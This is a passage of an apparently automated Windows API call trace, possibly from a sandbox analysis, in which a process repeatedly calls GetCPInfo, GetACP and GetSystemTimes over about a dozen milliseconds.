lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.978] GetACP () returned 0x4e4 [0128.978] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.978] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.978] GetACP () returned 0x4e4 [0128.978] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.978] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.978] GetACP () returned 0x4e4 [0128.978] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.978] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.978] GetACP () returned 0x4e4 [0128.978] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.978] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.978] GetACP () returned 0x4e4 [0128.978] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.978] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.978] GetACP () returned 0x4e4 [0128.978] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.979] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.979] GetACP () returned 0x4e4 [0128.979] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.979] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.979] GetACP () returned 0x4e4 [0128.979] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.979] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.979] GetACP () returned 0x4e4 [0128.979] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.979] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.979] GetACP () returned 0x4e4 [0128.979] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.979] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.979] GetACP () returned 0x4e4 [0128.979] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.979] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.979] GetACP () returned 0x4e4 [0128.979] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.979] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.979] GetACP () returned 0x4e4 [0128.979] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.980] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.980] GetACP () returned 0x4e4 [0128.980] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.980] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.980] GetACP () returned 0x4e4 [0128.980] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.980] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.980] GetACP () returned 0x4e4 [0128.980] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.980] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.980] GetACP () returned 0x4e4 [0128.980] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.980] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.980] GetACP () returned 0x4e4 [0128.980] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.980] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.980] GetACP () returned 0x4e4 [0128.980] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.980] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.980] GetACP () returned 0x4e4 [0128.981] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.981] GetACP () returned 0x4e4 [0128.981] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.981] GetACP () returned 0x4e4 [0128.981] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.981] GetACP () returned 0x4e4 [0128.981] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.981] GetACP () returned 0x4e4 [0128.981] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.981] GetACP () returned 0x4e4 [0128.981] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.981] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.981] GetACP () returned 0x4e4 [0128.981] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.982] GetACP () returned 0x4e4 [0128.982] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.982] GetACP () returned 0x4e4 [0128.982] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.982] GetACP () returned 0x4e4 [0128.982] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.982] GetACP () returned 0x4e4 [0128.982] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.982] GetACP () returned 0x4e4 [0128.982] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.982] GetACP () returned 0x4e4 [0128.982] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.982] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.982] GetACP () returned 0x4e4 [0128.982] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.983] GetACP () returned 0x4e4 [0128.983] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.983] GetACP () returned 0x4e4 [0128.983] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.983] GetACP () returned 0x4e4 [0128.983] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.983] GetACP () returned 0x4e4 [0128.983] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.983] GetACP () returned 0x4e4 [0128.983] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.983] GetACP () returned 0x4e4 [0128.983] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.983] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.984] GetACP () returned 0x4e4 [0128.984] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.984] GetACP () returned 0x4e4 [0128.984] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.984] GetACP () returned 0x4e4 [0128.984] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.984] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.984] GetACP () returned 0x4e4 [0128.984] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.985] GetACP () returned 0x4e4 [0128.985] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.985] GetACP () returned 0x4e4 [0128.985] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.985] GetACP () returned 0x4e4 [0128.985] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.985] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.986] GetACP () returned 0x4e4 [0128.986] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.986] GetACP () returned 0x4e4 [0128.986] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.986] GetACP () returned 0x4e4 [0128.986] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.986] GetACP () returned 0x4e4 [0128.986] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.986] GetACP () returned 0x4e4 [0128.986] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.986] GetACP () returned 0x4e4 [0128.986] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.986] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.986] GetACP () returned 0x4e4 [0128.986] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.987] GetACP () returned 0x4e4 [0128.987] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.987] GetACP () returned 0x4e4 [0128.987] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.987] GetACP () returned 0x4e4 [0128.987] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.987] GetACP () returned 0x4e4 [0128.987] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.987] GetACP () returned 0x4e4 [0128.987] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.987] GetACP () returned 0x4e4 [0128.987] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.987] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.987] GetACP () returned 0x4e4 [0128.987] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.988] GetACP () returned 0x4e4 [0128.988] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.988] GetACP () returned 0x4e4 [0128.988] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.988] GetACP () returned 0x4e4 [0128.988] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.988] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.988] GetACP () returned 0x4e4 [0128.988] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.989] GetACP () returned 0x4e4 [0128.989] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.989] GetACP () returned 0x4e4 [0128.989] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.989] GetACP () returned 0x4e4 [0128.989] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.989] GetACP () returned 0x4e4 [0128.989] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.989] GetACP () returned 0x4e4 [0128.989] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.989] GetACP () returned 0x4e4 [0128.989] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.989] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.990] GetACP () returned 0x4e4 [0128.990] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.990] GetACP () returned 0x4e4 [0128.990] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.990] GetACP () returned 0x4e4 [0128.990] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.990] GetACP () returned 0x4e4 [0128.990] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.990] GetACP () returned 0x4e4 [0128.990] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.990] GetACP () returned 0x4e4 [0128.990] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.990] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.990] GetACP () returned 0x4e4 [0128.990] GetSystemTimes (in: lpIdleTime=0x18fa70, 